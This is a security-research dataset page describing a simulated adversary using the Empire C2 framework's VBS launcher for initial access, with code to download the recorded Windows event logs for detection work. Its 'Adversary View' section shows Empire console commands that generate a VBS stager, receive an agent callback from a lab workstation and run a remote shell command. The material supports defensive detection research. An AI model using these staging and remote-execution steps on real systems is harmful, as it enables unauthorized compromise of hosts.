Empire VBS Execution

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

TA0002

Techniques

T1059.005

Tags

VBS Script Execution

Dataset Description

This dataset represents adversaries executing a VBS script as a launcher for initial access.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

launcher

Adversary View

(Empire: listeners) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > info

Name: VBS Launcher

Description:
  Generates a .vbs launcher for Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  Language         True        powershell        Language of the stager to generate.
  StagerRetries    False       0                 Times for the stager to retry
                                                connecting.
  OutFile          False       /tmp/launcher.vbs File to output .vbs launcher to,
                                                otherwise displayed on the screen.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                powershell code, uses the
                                                ObfuscateCommand for obfuscation types.
                                                For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                Only used if Obfuscate switch is True.
                                                For powershell only.
  UserAgent        False       default           User-agent string to use for the staging
                                                request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                or other).
  ProxyCreds       False       default           Proxy credentials
                                                ([domain\]username:password) to use for
                                                request (default, none, or other).


(Empire: stager/windows/launcher_vbs) > set Listener http
(Empire: stager/windows/launcher_vbs) > execute

[*] Stager output written out to: /tmp/launcher.vbs

(Empire: stager/windows/launcher_vbs) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent K47LRAEP checked in
[+] Initial agent K47LRAEP from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to K47LRAEP at 172.18.39.5

(Empire: stager/windows/launcher_vbs) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
K47LRAEP ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         2316   5/0.0    2020-09-04 20:10:07  http            

(Empire: agents) > interact K47LRAEP
(Empire: K47LRAEP) > 
(Empire: K47LRAEP) > shell whoami
[*] Tasked K47LRAEP to run TASK_SHELL
[*] Agent K47LRAEP tasked with task ID 1
(Empire: K47LRAEP) > 
theshire\pgustavo
..Command execution completed.

(Empire: K47LRAEP) > 
(Empire: K47LRAEP) > 

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/empire_launcher_vbs.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)